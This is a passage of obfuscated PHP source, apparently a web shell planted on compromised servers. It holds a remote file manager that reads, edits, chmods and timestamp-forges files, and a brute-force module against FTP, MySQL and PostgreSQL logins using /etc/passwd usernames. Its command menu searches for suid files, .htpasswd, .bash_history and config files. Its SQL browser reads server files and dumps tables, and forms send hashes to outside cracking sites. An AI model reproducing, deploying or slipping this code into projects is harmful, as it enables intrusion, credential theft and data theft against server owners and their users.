Aec4d; A8a85: return strtoupper($r); goto ce654; Ebca6: if (!($i < strlen($p))) { goto Fe1b4; } goto B8935; Fdac2: Fe1b4: goto A8a85; ec2a8: $r = ''; goto e1418; B8935: $r .= '%' . dechex(ord($p[$i])); goto A6610; ce654: } } goto F98ad; B4727: if (!empty($_POST['p1'])) { if (in_array($_POST['p1'], $stringTools)) { echo htmlspecialchars($_POST['p1']($_POST['p2'])); } } goto E26f9; A5f75: if (!function_exists('hex2bin')) { function hex2bin($p) { return decbin(hexdec($p)); } } goto f039e; E62b7: echo "</div><br><h1>Search for hash:</h1><div class=content>\r\n\t\t<form method='post' target='_blank' name='hf'>\r\n\t\t\t<input type='text' name='hash' style='width:200px;'><br>\r\n <input type='hidden' name='act' value='find'/>\r\n\t\t\t<input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>\r\n\t\t\t<input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>\r\n <input type='button' value='crackfor.me' onclick=\"document.hf.action='http://crackfor.me/index.php';document.hf.submit()\"><br>\r\n\t\t</form></div>"; goto c539d; F98ad: $stringTools = array('Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen'); goto d44af; C5289: function nWfzhRecursiveGlob($path) { goto f0675; E3fd8: if (is_array($paths) && @count($paths)) { foreach ($paths as $item) { if (@is_dir($item)) { if ($path != $item) { nWfzhRecursiveGlob($item); } } else { if (empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2']) !== false) { echo "<a href='#' onclick='g(\"FilesTools\",null,\"" . urlencode($item) . "\", \"view\",\"\")'>" . htmlspecialchars($item) . "</a><br>"; } } dbde6: } D27d6: } goto e2314; f85d0: $paths = @array_unique(@array_merge(@glob($path . $_POST['p3']), @glob($path . '*', GLOB_ONLYDIR))); goto E3fd8; f0675: if (substr($path, -1) != '/') { $path .= '/'; } goto f85d0; e2314: } goto d0a16; E4862: echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . "> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>" . (empty($_POST['p1']) ? '' : htmlspecialchars(@$_POST['p2'])) . "</textarea></form><pre class='ml1' style='" . (empty($_POST['p1']) ? 'display:none;' : '') . "margin-top:5px' id='strOutput'>"; goto B4727; df26e: if (!function_exists('hex2ascii')) { function hex2ascii($p) { goto d1d59; d1d59: $r = ''; goto acceb; Cd325: C4498: goto e816d; acceb: $i = 0; goto Cd325; F9f97: cf43c: goto bf3e5; bf3e5: $i += 2; goto cb8b6; cb8b6: goto C4498; goto D4938; D4938: e8b45: goto fa716; fa716: return $r; goto e40ee; A00d9: $r .= chr(hexdec($p[$i] . $p[$i + 1])); goto F9f97; e816d: if (!($i < strLen($p))) { goto e8b45; } goto A00d9; e40ee: } } goto Bf766; D06bd: nWfzhHeader(); goto f52df; B2c2d: if (empty($_POST['ajax']) && !empty($_POST['p1'])) { nWfzhsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); } goto D06bd; f52df: echo '<h1>String conversions</h1><div class=content>'; goto B7f20; d0a16: if (@$_POST['p3']) { nWfzhRecursiveGlob($_POST['c']); } goto E62b7; F2648: } goto f36c9; C3f56: $safe_mode = @ini_get('safe_mode'); goto Eb763; F7c7f: @ini_set('error_log', NULL); goto b8976; B37cf: $default_action = 'FilesMan'; goto dd1cc; a7327: if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $os = 'win'; } else { $os = 'nix'; } goto C3f56; cfad7: $disable_functions = @ini_get('disable_functions'); goto A74ac; a18f7: @set_time_limit(0); goto a892c; f36c9: function actionFilesTools() { goto Afea6; c67ea: switch ($_POST['p2']) { case 'view': goto B2ecd; fe79d: if ($fp) { goto E96f8; E96f8: D638d: goto A4007; A4007: if (@feof($fp)) { goto Aff24; } goto a438a; a438a: echo htmlspecialchars(@fread($fp, 1024)); goto bf4d2; b6c5e: @fclose($fp); goto bb91a; bf4d2: goto D638d; goto F8c5e; F8c5e: Aff24: goto b6c5e; bb91a: } goto a7328; Cd044: $fp = @fopen($_POST['p1'], 'r'); goto fe79d; a7328: echo '</pre>'; goto a1721; a1721: goto db269; goto e1ccb; B2ecd: echo '<pre class=ml1>'; goto Cd044; e1ccb: case 'highlight': if (@is_readable($_POST['p1'])) { goto E5ce5; E5ce5: echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">'; goto f442d; f442d: $code = @highlight_file($_POST['p1'], true); goto A9edf; A9edf: echo str_replace(array('<span ', '</span>'), array('<font ', '</font>'), $code) . '</div>'; goto A7a53; A7a53: } goto db269; case 'chmod': goto Fee5c; B4dbd: clearstatcache(); goto cde21; Fee5c: if (!empty($_POST['p3'])) { goto D7104; D7104: $perms = 0; goto ead23; A5d6a: --$i; goto baed2; b9bfa: Ed663: goto A417b; Ca188: Cff7a: goto A5d6a; ead23: $i = strlen($_POST['p3']) - 1; goto E9bcc; A417b: if (!@chmod($_POST['p1'], $perms)) { echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>'; } goto B5c4f; C53d2: if (!($i >= 0)) { goto Ed663; } goto d2d1c; E9bcc: cea94: goto C53d2; d2d1c: $perms += (int) $_POST['p3'][$i] * pow(8, strlen($_POST['p3']) - $i - 1); goto Ca188; baed2: goto cea94; goto b9bfa; B5c4f: } goto B4dbd; cde21: echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="' . substr(sprintf('%o', fileperms($_POST['p1'])), -4) . '"><input type=submit value=">>"></form>'; goto Dc739; Dc739: goto db269; goto B5d27; B5d27: case 'edit': goto dfbb7; E04e2: if (!empty($_POST['p3'])) { goto e0d30; f6682: if ($fp) { goto D23e3; Dc5e2: @touch($_POST['p1'], $time, $time); goto E4903; D23e3: @fwrite($fp, $_POST['p3']); goto a03ec; a03ec: @fclose($fp); goto Dd38d; Dd38d: echo 'Saved!<br><script>p3_="";</script>'; goto Dc5e2; E4903: } goto de0d9; a370b: $fp = @fopen($_POST['p1'], "w"); goto f6682; e0d30: $time = @filemtime($_POST['p1']); goto c03be; c03be: $_POST['p3'] = substr($_POST['p3'], 1); goto a370b; de0d9: } goto c0eee; Df7e9: goto db269; goto D37f1; a380d: $fp = @fopen($_POST['p1'], 'r'); goto F9cca; F9cca: if ($fp) { goto Fa745; E72ab: echo htmlspecialchars(@fread($fp, 1024)); goto D2007; Fa745: E320a: goto E1a95; fd78e: @fclose($fp); goto f2520; E1a95: if (@feof($fp)) { goto c3b97; } goto E72ab; fecba: c3b97: goto fd78e; D2007: goto E320a; goto fecba; f2520: } goto D9358; dfbb7: if (!is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; goto db269; } goto E04e2; D9358: echo '</textarea><input type=submit value=">>"></form>'; goto Df7e9; c0eee: echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>'; goto a380d; D37f1: case 'hexdump': goto ec1aa; c465b: if (!($i < $len)) { goto A900b; } goto b8659; D3b78: $n++; goto b7182; b3b3e: $len = strlen($c); goto f0f48; f0f48: $i = 0; goto Ad87c; b8659: $h[1] .= sprintf('%02X', ord($c[$i])) . ' '; goto C05b7; C2ea3: goto db269; goto bdd49; F66f4: $h = array('00000000<br>', '', ''); goto b3b3e; ec1aa: $c = @file_get_contents($_POST['p1']); goto cd73a; cd73a: $n = 0; goto F66f4; Ee2d3: goto a88fe; goto beb89; Ad87c: a88fe: goto c465b; f263a: A348e: goto D3b78; beb89: A900b: goto ba9d2; Fab3d: A3d96: goto Ec8cf; bde3b: C0d16: goto f263a; C05b7: switch (ord($c[$i])) { case 0: $h[2] .= ' '; goto A348e; case 9: $h[2] .= ' '; goto A348e; case 10: $h[2] .= ' '; goto A348e; case 13: $h[2] .= ' '; goto A348e; default: $h[2] .= $c[$i]; goto A348e; } goto bde3b; b7182: if ($n == 32) { goto c9c4b; c9c4b: $n = 0; goto e0f2a; e0f2a: if ($i + 1 < $len) { $h[0] .= sprintf('%08X', $i + 1) . '<br>'; } goto B12a0; Bf54c: $h[2] .= "\n"; goto E0bd3; B12a0: $h[1] .= '<br>'; goto Bf54c; E0bd3: } goto Fab3d; ba9d2: echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>' . $h[0] . '</pre></span></td><td bgcolor=#282828><pre>' . $h[1] . '</pre></td><td bgcolor=#333333><pre>' . htmlspecialchars($h[2]) . '</pre></td></tr></table>'; goto C2ea3; Ec8cf: ++$i; goto Ee2d3; bdd49: case 'rename': goto f161c; c399d: echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="' . htmlspecialchars($_POST['p1']) . '"><input type=submit value=">>"></form>'; goto a3294; f161c: if (!empty($_POST['p3'])) { if (!@rename($_POST['p1'], $_POST['p3'])) { echo 'Can\'t rename!<br>'; } else { die('<script>g(null,null,"' . urlencode($_POST['p3']) . '",null,"")</script>'); } } goto c399d; a3294: goto db269; goto f7285; f7285: case 'touch': goto b71c2; b71c2: if (!empty($_POST['p3'])) { $time = strtotime($_POST['p3']); if ($time) { if (!touch($_POST['p1'], $time, $time)) { echo 'Fail!'; } else { echo 'Touched!'; } } else { echo 'Bad time format!'; } } goto E96a7; E96a7: clearstatcache(); goto F710a; F710a: echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="' . date("Y-m-d H:i:s", @filemtime($_POST['p1'])) . '"><input type=submit value=">>"></form>'; goto e75b5; e75b5: goto db269; goto F16bb; F16bb: } goto bc809; E3d5a: if (@$_POST['p2'] == 'download') { if (@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { goto Be274; b80a4: if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']); header("Content-Type: " . $type); } else { header("Content-Type: application/octet-stream"); } goto F4d33; Be274: ob_start("ob_gzhandler", 4096); goto abffe; F4d33: $fp = @fopen($_POST['p1'], "r"); goto c5091; abffe: header("Content-Disposition: attachment; filename=" . basename($_POST['p1'])); goto b80a4; c5091: if ($fp) { goto bc033; E5cb2: goto F7d02; goto fe8a9; Cabd2: echo @fread($fp, 1024); goto E5cb2; bc85d: fclose($fp); goto c4889; bc033: F7d02: goto Fa468; fe8a9: bd790: goto bc85d; Fa468: if (@feof($fp)) { goto bd790; } goto Cabd2; c4889: } goto b1cf1; b1cf1: } exit; } goto Adb07; d4bc4: db269: goto Be228; C2a32: nWfzhHeader(); goto Cf38e; C063d: if (is_file($_POST['p1'])) { $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); } else { $m = array('Chmod', 'Rename', 'Touch'); } goto B0245; Afea6: if (isset($_POST['p1'])) { $_POST['p1'] = urldecode($_POST['p1']); } goto E3d5a; B8ef5: echo '<br><br>'; goto c67ea; C79c4: $uid = @posix_getpwuid(@fileowner($_POST['p1'])); goto D7f65; E8011: if (empty($_POST['p2'])) { $_POST['p2'] = 'view'; } goto C063d; Bdfea: if (!file_exists(@$_POST['p1'])) { goto Bf43c; Bf43c: echo 'File not exists'; goto abc5e; F3637: return; goto Cf629; abc5e: nWfzhFooter(); goto F3637; Cf629: } goto C79c4; d2281: E5958: goto B8ef5; Adb07: if (@$_POST['p2'] == 'mkfile') { if (!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if ($fp) { $_POST['p2'] = "edit"; fclose($fp); } } } goto C2a32; D7f65: if (!$uid) { $uid['name'] = @fileowner($_POST['p1']); $gid['name'] = @filegroup($_POST['p1']); } else { $gid = @posix_getgrgid(@filegroup($_POST['p1'])); } goto e79f4; Be228: echo '</div>'; goto b1a4c; e79f4: echo '<span>Name:</span> ' . htmlspecialchars(@basename($_POST['p1'])) . ' <span>Size:</span> ' . (is_file($_POST['p1']) ? nWfzhViewSize(filesize($_POST['p1'])) : '-') . ' <span>Permission:</span> ' . nWfzhPermsColor($_POST['p1']) . ' <span>Owner/Group:</span> ' . $uid['name'] . '/' . $gid['name'] . '<br>'; goto Bfbb0; bc809: b834c: goto d4bc4; b1a4c: nWfzhFooter(); goto Ea8f7; B0245: foreach ($m as $v) { echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\'' . strtolower($v) . '\')">' . (strtolower($v) == @$_POST['p2'] ? '<b>[ ' . $v . ' ]</b>' : $v) . '</a> '; F8108: } goto d2281; Cf38e: echo '<h1>File tools</h1><div class=content>'; goto Bdfea; Bfbb0: echo '<span>Change time:</span> ' . date('Y-m-d H:i:s', filectime($_POST['p1'])) . ' <span>Access time:</span> ' . date('Y-m-d H:i:s', fileatime($_POST['p1'])) . ' <span>Modify time:</span> ' . date('Y-m-d H:i:s', filemtime($_POST['p1'])) . '<br><br>'; goto E8011; Ea8f7: } goto c8a09; C8433: if ($os == 'win') { $aliases = array("List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all"); } else { $aliases = array("List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv"); } goto ca726; b9836: function nWfzhWhich($p) { goto Ad4c1; Ecf3e: if (!empty($path)) { return $path; } goto Cc879; Cc879: return false; goto D2791; Ad4c1: $path = nWfzhEx('which ' . $p); goto Ecf3e; D2791: } goto b7dff; d61c6: if (!function_exists("posix_getgrgid") && strpos($GLOBALS['disable_functions'], 'posix_getgrgid') === false) { function posix_getgrgid($p) { return false; } } goto Dc03e; fbb7a: function actionBruteforce() { goto B7db6; Ae830: nWfzhFooter(); goto b1833; B7db6: nWfzhHeader(); goto d1cd2; e275c: echo '</div><br>'; goto Ae830; d1cd2: if (isset($_POST['proto'])) { goto B0268; Ef13f: if ($_POST['proto'] == 'ftp') { function nWfzhBruteForce($ip, $port, $login, $pass) { goto De2a4; De2a4: $fp = @ftp_connect($ip, $port ? $port : 21); goto ad191; Bac2a: @ftp_close($fp); goto D495a; D60b8: $res = @ftp_login($fp, $login, $pass); goto Bac2a; D495a: return $res; goto Cae24; ad191: if (!$fp) { return false; } goto D60b8; Cae24: } } elseif ($_POST['proto'] == 'mysql') { function nWfzhBruteForce($ip, $port, $login, $pass) { goto A9274; Ddf95: @mysql_close($res); goto Aa79a; A9274: $res = @mysql_connect($ip . ':' . ($port ? $port : 3306), $login, $pass); goto Ddf95; Aa79a: return $res; goto c144e; c144e: } } elseif ($_POST['proto'] == 'pgsql') { function nWfzhBruteForce($ip, $port, $login, $pass) { goto Adec6; fc4d9: $res = @pg_connect($str); goto C1ee4; Adec6: $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres"; goto fc4d9; C1ee4: @pg_close($res); goto E342a; E342a: return $res; goto A18c0; A18c0: } } goto d83c9; Ea0af: if ($_POST['type'] == 1) { $temp = @file('/etc/passwd'); if (is_array($temp)) { foreach ($temp as $line) { goto Ef624; Baf09: if (@$_POST['reverse']) { goto Cfc49; F0745: b1e55: goto a7a12; Bf743: goto b2329; goto Afef9; a7a12: --$i; goto Bf743; Eae04: $i = strlen($line[0]) - 1; goto C0ae8; C0ae8: b2329: goto fd12b; Afef9: d5fdb: goto F1cad; fd12b: if (!($i >= 0)) { goto d5fdb; } goto F8a92; Cfc49: $tmp = ""; goto Eae04; F8a92: $tmp .= $line[0][$i]; goto F0745; F1cad: ++$attempts; goto e0215; e0215: if (nWfzhBruteForce(@$server[0], @$server[1], $line[0], $tmp)) { $success++; echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($tmp); } goto Db079; Db079: } goto ba290; Ef624: $line = explode(":", $line); goto ad96d; ad96d: ++$attempts; goto db7ca; db7ca: if (nWfzhBruteForce(@$server[0], @$server[1], $line[0], $line[0])) { $success++; echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($line[0]) . '<br>'; } goto Baf09; ba290: d3b1d: goto D7a35; D7a35: } B21d1: } } elseif ($_POST['type'] == 2) { $temp = @file($_POST['dict']); if (is_array($temp)) { foreach ($temp as $line) { goto e970d; E562b: F2138: goto B80ec; a6e9c: ++$attempts; goto Fa664; Fa664: if (nWfzhBruteForce($server[0], @$server[1], $_POST['login'], $line)) { $success++; echo '<b>' . htmlspecialchars($_POST['login']) . '</b>:' . htmlspecialchars($line) . '<br>'; } goto E562b; e970d: $line = trim($line); goto a6e9c; B80ec: } A6654: } } goto f72e6; B0268: echo '<h1>Results</h1><div class=content><span>Type:</span> ' . htmlspecialchars($_POST['proto']) . ' <span>Server:</span> ' . htmlspecialchars($_POST['server']) . '<br>'; goto Ef13f; C28d0: $attempts = 0; goto Cfdf2; Cfdf2: $server = explode(":", $_POST['server']); goto Ea0af; d83c9: $success = 0; goto C28d0; f72e6: echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>"; goto d2406; d2406: } goto e1a08; e1a08: echo '<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' . '<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>' . '<input type=hidden name=c value="' . htmlspecialchars($GLOBALS['cwd']) . '">' . '<input type=hidden name=a value="' . htmlspecialchars($_POST['a']) . '">' . '<input type=hidden name=charset value="' . htmlspecialchars($_POST['charset']) . '">' . '<span>Server:port</span></td>' . '<td><input type=text name=server value="127.0.0.1"></td></tr>' . '<tr><td><span>Brute type</span></td>' . '<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' . '<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' . '<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' . '<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' . '<td><input type=text name=login value="root"></td></tr>' . '<tr><td><span>Dictionary</span></td>' . '<td><input type=text name=dict value="' . htmlspecialchars($GLOBALS['cwd']) . 'passwd.dic"></td></tr></table>' . '</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>'; goto e275c; b1833: } goto Fef9b; fda81: function nWfzhScandir($dir) { if (function_exists("scandir")) { return scandir($dir); } else { goto cbabc; bfe4c: be6fb: goto cfa61; D464f: return $files; goto a377b; bf0cd: a584f: goto D464f; Ac4aa: goto be6fb; goto bf0cd; cbabc: $dh = opendir($dir); goto bfe4c; cfa61: if (!(false !== ($filename = readdir($dh)))) { goto a584f; } goto c6439; c6439: $files[] = $filename; goto Ac4aa; a377b: } } goto b9836; cc88d: function nWfzhsetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } goto d6719; Fef9b: function actionSql() { goto F5256; F5256: class DbClass { var $type; var $link; var $res; function __construct($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { goto C5583; C5583: switch ($this->type) { case 'mysql': if ($this->link = @mysql_connect($host, $user, $pass, true)) { return true; } goto Df47b; case 'pgsql': goto d0d59; Dd65e: if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}")) { return true; } goto dc85b; a8dc8: if (!$host[1]) { $host[1] = 5432; } goto Dd65e; d0d59: $host = explode(':', $host); goto a8dc8; dc85b: goto Df47b; goto f00dd; f00dd: } goto C31ff; bb3b1: Df47b: goto e29ff; e29ff: return false; goto E9586; C31ff: F8e06: goto bb3b1; E9586: } function selectdb($db) { goto E4599; F3e72: return false; goto B72f7; E4599: switch ($this->type) { case 'mysql': if (@mysql_select_db($db)) { return true; } goto Ed8f3; } goto c6a5a; C7b24: Ed8f3: goto F3e72; c6a5a: A0162: goto C7b24; B72f7: } function query($str) { goto Adaca; Adaca: switch ($this->type) { case 'mysql': return $this->res = @mysql_query($str); goto Ba2da; case 'pgsql': return $this->res = @pg_query($this->link, $str); goto Ba2da; } goto d80ef; Ee235: Ba2da: goto c22ab; c22ab: return false; goto ba47e; d80ef: Aa99c: goto Ee235; ba47e: } function fetch() { goto Ac2c1; Ac2c1: $res = func_num_args() ? func_get_arg(0) : $this->res; goto C6ac5; D6b1b: return false; goto ae584; b72b1: a446b: goto D6b1b; D2173: c719a: goto b72b1; C6ac5: switch ($this->type) { case 'mysql': return @mysql_fetch_assoc($res); goto a446b; case 'pgsql': return @pg_fetch_assoc($res); goto a446b; } goto D2173; ae584: } function listDbs() { goto D3531; a6757: C7bf3: goto d5fd6; d5fd6: return false; goto eda49; D3531: switch ($this->type) { case 'mysql': return $this->query("SHOW databases"); goto C7bf3; case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); goto C7bf3; } goto Aeb10; Aeb10: C3f83: goto a6757; eda49: } function listTables() { goto b99c7; a4c5a: E0b37: goto A2a6d; A2a6d: return false; goto e61e8; b99c7: switch ($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES'); goto E0b37; case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); goto E0b37; } goto c576f; c576f: f0827: goto a4c5a; e61e8: } function error() { goto c0825; B1faf: return false; goto de11c; c9056: cc9fb: goto A2a81; A2a81: A5c56: goto B1faf; c0825: switch ($this->type) { case 'mysql': return @mysql_error(); goto A5c56; case 'pgsql': return @pg_last_error(); goto A5c56; } goto c9056; de11c: } function setCharset($str) { goto c5fe8; c5ea5: F5b8d: goto be3fe; be3fe: Bf591: goto F7220; F7220: return false; goto b9288; c5fe8: switch ($this->type) { case 'mysql': if (function_exists('mysql_set_charset')) { return @mysql_set_charset($str, $this->link); } else { $this->query('SET CHARSET ' . $str); } goto Bf591; case 'pgsql': return @pg_set_client_encoding($this->link, $str); goto Bf591; } goto c5ea5; b9288: } function loadFile($str) { goto Ccb24; A7338: Fcfc5: goto C60cf; A1480: return false; goto A8969; Ccb24: switch ($this->type) { case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file")); goto Fed91; case 'pgsql': goto C60da; C60da: $this->query("CREATE TABLE nWfzh2(file text);COPY nWfzh2 FROM '" . addslashes($str) . "';select file from nWfzh2;"); goto b8b05; fe45b: $r[] = $i['file']; goto a4ac2; ba29c: if (!($i = $this->fetch())) { goto e9d62; } goto fe45b; D8716: return array('file' => implode("\n", $r)); goto E9c3b; E9c3b: goto Fed91; goto fb1b0; C2a88: a23bb: goto ba29c; b8b05: $r = array(); goto C2a88; a4ac2: goto a23bb; goto Ae2f7; A8f44: $this->query('drop table nWfzh2'); goto D8716; Ae2f7: e9d62: goto A8f44; fb1b0: } goto A7338; C60cf: Fed91: goto A1480; A8969: } function dump($table, $fp = false) { goto C178d; fdc7a: B05de: goto Bff76; fdd65: return false; goto F5ab1; Bff76: Eeca3: goto fdd65; C178d: switch ($this->type) { case 'mysql': goto a1cd8; Ac45d: F5314: goto a6dfb; b0c9b: cd3dc: goto D99d0; F8de5: if ($fp) { fwrite($fp, $sql); } else { echo $sql; } goto c0276; a1cd8: $res = $this->query('SHOW CREATE TABLE `' . $table . '`'); goto De55e; a6dfb: if (!($item = $this->fetch())) { goto cd3dc; } goto d3cb9; Cbf88: if ($head) { $sql .= 'INSERT INTO `' . $table . '` (' . implode(", ", $columns) . ") VALUES \n\t(" . implode(", ", $item) . ')'; $head = false; } else { $sql .= "\n\t,(" . implode(", ", $item) . ')'; } goto F8de5; e691e: $head = true; goto Ac45d; e4217: $this->query('SELECT * FROM `' . $table . '`'); goto deffa; a546c: foreach ($item as $k => $v) { goto cf4fa; cf4fa: if ($v === null) { $item[$k] = "NULL"; } elseif (is_int($v)) { $item[$k] = $v; } else { $item[$k] = "'" . @mysql_real_escape_string($v) . "'"; } goto Baf15; Baf15: $columns[] = "`" . $k . "`"; goto B9749; B9749: F257c: goto c0410; c0410: } goto E0c30; Cf592: $sql = $create[1] . ";\n"; goto Bd073; De55e: $create = mysql_fetch_array($res); goto Cf592; D99d0: if (!$head) { if ($fp) { fwrite($fp, ";\n\n"); } else { echo ";\n\n"; } } goto df951; c0276: $i++; goto A637e; df951: goto Eeca3; goto e1a94; F4612: $columns = array(); goto a546c; deffa: $i = 0; goto e691e; Bd073: if ($fp) { fwrite($fp, $sql); } else { echo $sql; } goto e4217; d3cb9: $sql = ''; goto A5f99; A637e: goto F5314; goto b0c9b; E0c30: e5230: goto Cbf88; A5f99: if ($i % 1000 == 0) { $head = true; $sql = ";\n\n"; } goto F4612; e1a94: case 'pgsql': goto d4a2b; e6393: if (!($item = $this->fetch())) { goto D3aa9; } goto a7a34; F41bd: goto Ed599; goto a906a; b49ea: goto Eeca3; goto E9c5e; e0a2f: $sql = 'INSERT INTO ' . $table . ' (' . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ');' . "\n"; goto ab8fa; d4a2b: $this->query('SELECT * FROM ' . $table); goto d6e53; ab8fa: if ($fp) { fwrite($fp, $sql); } else { echo $sql; } goto F41bd; E2fcc: foreach ($item as $k => $v) { goto ead39; ead39: $item[$k] = "'" . addslashes($v) . "'"; goto Bafca; F77d2: D4dfe: goto E1754; Bafca: $columns[] = $k; goto F77d2; E1754: } goto bdfbb; d6e53: Ed599: goto e6393; a906a: D3aa9: goto b49ea; bdfbb: Acdca: goto e0a2f; a7a34: $columns = array(); goto E2fcc; E9c5e: } goto fdc7a; F5ab1: } } goto De129; ac17d: $tmp = "<input type=text name=sql_base value=''>"; goto e9bce; E69ae: echo "\r\n<h1>Sql browser</h1><div class=content>\r\n<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>\r\n<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>\r\n<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\r\n<td><select name='type'><option value='mysql' "; goto d7762; C8c9c: echo ">PostgreSql</option></select></td>\r\n<td><input type=text name=sql_host value=\"" . (empty($_POST['sql_host']) ? 'localhost' : htmlspecialchars($_POST['sql_host'])) . "\"></td>\r\n<td><input type=text name=sql_login value=\"" . (empty($_POST['sql_login']) ? 'root' : htmlspecialchars($_POST['sql_login'])) . "\"></td>\r\n<td><input type=text name=sql_pass value=\"" . (empty($_POST['sql_pass']) ? '' : htmlspecialchars($_POST['sql_pass'])) . "\"></td><td>"; goto ac17d; Fab9b: if (@$_POST['type'] == 'pgsql') { echo 'selected'; } goto C8c9c; d7762: if (@$_POST['type'] == 'mysql') { echo 